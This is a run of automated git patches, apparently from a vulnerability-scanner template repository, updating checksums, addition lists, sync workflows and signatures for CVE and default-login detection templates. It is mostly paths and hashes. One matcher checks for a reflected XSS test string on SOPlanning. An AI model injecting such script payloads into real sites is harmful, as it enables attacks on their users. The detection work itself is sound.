http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 +http/cves/2024/CVE-2024-33575.yaml:715f9bfcab6414e17651b7602dcd7c260ab0c3c9 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -3436,7 +3437,7 @@ http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3 http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 -http/default-logins/soplanning/soplanning-default-login.yaml:69e6c5ca20fc8aa38d0eb8bfb195c0daf04589fc +http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7 http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40 http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c @@ -8449,15 +8450,19 @@ network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 +profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc -profiles/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 -profiles/kev.yml:4317bb80617dbbfa0921e3f2164eec962b9d6517 +profiles/cves.yml:7329a9286f8a79e7caeb008a83003d3714e3141b +profiles/default-login.yml:4f58d7f7dcce8c8206816b835cf576a9c7af6d1a +profiles/kev.yml:d2a9c9f9667ae3ae7564df6c766db9def45de916 +profiles/misconfigurations.yml:e755a0f2b337b1b383f027ac5265ebc2799d5e1d profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 +profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521 @@ -8487,7 +8492,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b3313279ef134e78fe94c37b7c546ef13a5cd806 +templates-checksum.txt:793c573d0e03141edf4f57bbeb11b232132d8c80 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 915a059d6fbaf0fae2f8956aa9f3ae8b1d803f55 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:10:00 +0000 Subject: [PATCH 0710/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3270589a6d..58cf570d6d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,6 +37,7 @@ on: - 'http/cves/2024/CVE-2024-31851.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/cves/2024/CVE-2024-32640.yaml' + - 'http/cves/2024/CVE-2024-33575.yaml' - 'http/cves/2024/CVE-2024-4040.yaml' - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' From b5edd9f924f93adc6759c231784d6f9136ed4ab4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:10:15 +0000 Subject: [PATCH 0711/1768] Auto Generated New Template Addition List [Wed May 8 10:10:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 45c2193824..1d8dffbcbf 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2023/CVE-2023-5003.yaml http/cves/2023/CVE-2023-6389.yaml +http/cves/2023/CVE-2023-6989.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-0881.yaml http/cves/2024/CVE-2024-1183.yaml From bebfe02e91c42c9b6a511af057fbc06a8d33c52b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:10:20 +0000 Subject: [PATCH 0712/1768] Auto Generated Templates Checksum [Wed May 8 10:10:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b57a48b55a..ab7025f586 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3223,6 +3223,7 @@ http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 +http/cves/2023/CVE-2023-6989.yaml:d00f0a2249e0bde6f0803f5bb7884544e5cadfd4 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -8492,7 +8493,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:793c573d0e03141edf4f57bbeb11b232132d8c80 +templates-checksum.txt:381b34180245e1c647a1e671b5961080a92e0d67 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e4aa39e75f748da25722df6fade3617e943d26b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:10:54 +0000 Subject: [PATCH 0713/1768] Auto Generated New Template Addition List [Wed May 8 10:10:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1d8dffbcbf..83622a4ce6 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ http/cves/2024/CVE-2024-31850.yaml http/cves/2024/CVE-2024-31851.yaml http/cves/2024/CVE-2024-32399.yaml http/cves/2024/CVE-2024-32640.yaml +http/cves/2024/CVE-2024-32651.yaml http/cves/2024/CVE-2024-33575.yaml http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml From 2208679b7fa132acd5a8f7fbc97a6c800d4448fb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:11:00 +0000 Subject: [PATCH 0714/1768] Auto Generated Templates Checksum [Wed May 8 10:11:00 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ab7025f586..bc4f2841e7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3279,6 +3279,7 @@ http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 +http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-33575.yaml:715f9bfcab6414e17651b7602dcd7c260ab0c3c9 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -8493,7 +8494,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:381b34180245e1c647a1e671b5961080a92e0d67 +templates-checksum.txt:6bd49a131f5cb57385a5c7566ed697861f0bdd59 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c59143cee0ce70bed18e065f46e7b612b69cddaa Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:10:59 +0000 Subject: [PATCH 0715/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 58cf570d6d..be0a364da9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2023/CVE-2023-5003.yaml' - 'http/cves/2023/CVE-2023-6389.yaml' + - 'http/cves/2023/CVE-2023-6989.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-0881.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' From a7f2f8da7b465be4588a2b231aacf5ba63e33a5c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:11:11 +0000 Subject: [PATCH 0716/1768] Auto Template Signing [Wed May 8 10:11:11 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index af627a67e4..5d341c440a 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fd50be1fcb931f42ea5bd6a0cd03d98f5a8eed134374d6988f80cc1fcb95ff802200a1b9c40d7c51f44193a0674840be4e38fdcd3feca29712ccffaf4aa7b77c240:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index 57fdd9c388..df83db4763 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -36,3 +36,4 @@ http: - 'status_code == 200' - 'contains(body, "um-debug<br/>")' condition: and +# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From da192562eae224b20f95c9e1e0dd6e63a687c494 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:11:34 +0000 Subject: [PATCH 0717/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index be0a364da9..f03b531a6a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -38,6 +38,7 @@ on: - 'http/cves/2024/CVE-2024-31851.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/cves/2024/CVE-2024-32640.yaml' + - 'http/cves/2024/CVE-2024-32651.yaml' - 'http/cves/2024/CVE-2024-33575.yaml' - 'http/cves/2024/CVE-2024-4040.yaml' - 'http/cves/2024/CVE-2024-4348.yaml' From b81358d7925b9c0dca56f1f1680ee61bb397194d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:12:45 +0000 Subject: [PATCH 0718/1768] Auto Generated New Template Addition List [Wed May 8 10:12:44 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 83622a4ce6..6684e8c295 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/cves/2024/CVE-2024-32399.yaml http/cves/2024/CVE-2024-32640.yaml http/cves/2024/CVE-2024-32651.yaml http/cves/2024/CVE-2024-33575.yaml +http/cves/2024/CVE-2024-33724.yaml http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml From eaad220dbe1eaf3be86329bdd2cd45926da73171 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:12:48 +0000 Subject: [PATCH 0719/1768] Auto Generated Templates Checksum [Wed May 8 10:12:48 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bc4f2841e7..f6bdfd701d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,14 +3274,15 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-31849.yaml:578b66b6ff4296a28215971e56f0896c24eedd00 +http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 -http/cves/2024/CVE-2024-33575.yaml:715f9bfcab6414e17651b7602dcd7c260ab0c3c9 +http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b +http/cves/2024/CVE-2024-33724.yaml:cb12817b487797686ea48ef42ff6735b28d3c2a6 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -8494,7 +8495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6bd49a131f5cb57385a5c7566ed697861f0bdd59 +templates-checksum.txt:6daf0c128d534a3887b61c77158735f327eb914e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cd3127bbfdd42c79324a019629bd5e65295b60db Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:13:33 +0000 Subject: [PATCH 0720/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f03b531a6a..8e8b980cc0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/cves/2024/CVE-2024-32640.yaml' - 'http/cves/2024/CVE-2024-32651.yaml' - 'http/cves/2024/CVE-2024-33575.yaml' + - 'http/cves/2024/CVE-2024-33724.yaml' - 'http/cves/2024/CVE-2024-4040.yaml' - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' From 07fb3cb5190dafa9b1a5bf117757660acd14c0b5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:14:29 +0000 Subject: [PATCH 0721/1768] Auto Template Signing [Wed May 8 10:14:28 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6989.yaml | 1 + http/cves/2024/CVE-2024-32651.yaml | 1 + http/cves/2024/CVE-2024-33724.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index c6f8150e45..9551426c51 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -53,3 +53,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 323e23e5b7..1a2deb2d94 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -54,3 +54,4 @@ http: - type: dsl dsl: - compare_versions(version, '<= 0.45.20') +# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index 56145be776..65df9f2f55 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -46,3 +46,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")' condition: and +# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e9db5a333d7a914c908693e1c49c57a7b0389c3a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 11:40:53 +0000 Subject: [PATCH 0722/1768] Auto Generated New Template Addition List [Wed May 8 11:40:53 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6684e8c295..63db7c6fb7 100644 --- a/.new-additions +++ b/.new-additions @@ -52,6 +52,7 @@ http/exposed-panels/teamforge-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml http/misconfiguration/titannit-web-exposure.yaml http/takeovers/squadcast-takeover.yaml http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml From 5151a5bf7e153b1513502550f2e67564a48c9efb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 11:41:05 +0000 Subject: [PATCH 0723/1768] Auto Generated Templates Checksum [Wed May 8 11:41:05 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f6bdfd701d..0d54a1b6d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3223,7 +3223,7 @@ http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 -http/cves/2023/CVE-2023-6989.yaml:d00f0a2249e0bde6f0803f5bb7884544e5cadfd4 +http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -3279,10 +3279,10 @@ http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 -http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890 +http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b -http/cves/2024/CVE-2024-33724.yaml:cb12817b487797686ea48ef42ff6735b28d3c2a6 +http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -5496,6 +5496,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:df0c00b3b41457ba24efd8cc1d8066b130c7bdbb http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -8495,7 +8496,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6daf0c128d534a3887b61c77158735f327eb914e +templates-checksum.txt:a1ca0edcd40435c24da57f95d469dcf0c40fbb41 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 86ebdfa3c64620788f5af39adb7b44b1e6d4c852 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 11:41:35 +0000 Subject: [PATCH 0724/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8e8b980cc0..11ae57e126 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -57,6 +57,7 @@ on: - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' + - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/takeovers/squadcast-takeover.yaml' - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' From b5575e0dcce1de7be1995b4965a0b30d873336b4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 11:42:07 +0000 Subject: [PATCH 0725/1768] Auto Generated New Template Addition List [Wed May 8 11:42:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63db7c6fb7..a5c49539aa 100644 --- a/.new-additions +++ b/.new-additions @@ -28,6 +28,7 @@ http/cves/2024/CVE-2024-27956.yaml http/cves/2024/CVE-2024-2876.yaml http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml +http/cves/2024/CVE-2024-31848.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-31850.yaml http/cves/2024/CVE-2024-31851.yaml From 75576c21184548bf2a764530ae163fa3f8fe3e5f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 11:42:13 +0000 Subject: [PATCH 0726/1768] Auto Generated Templates Checksum [Wed May 8 11:42:13 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0d54a1b6d0..bccdf155f0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,6 +3274,7 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 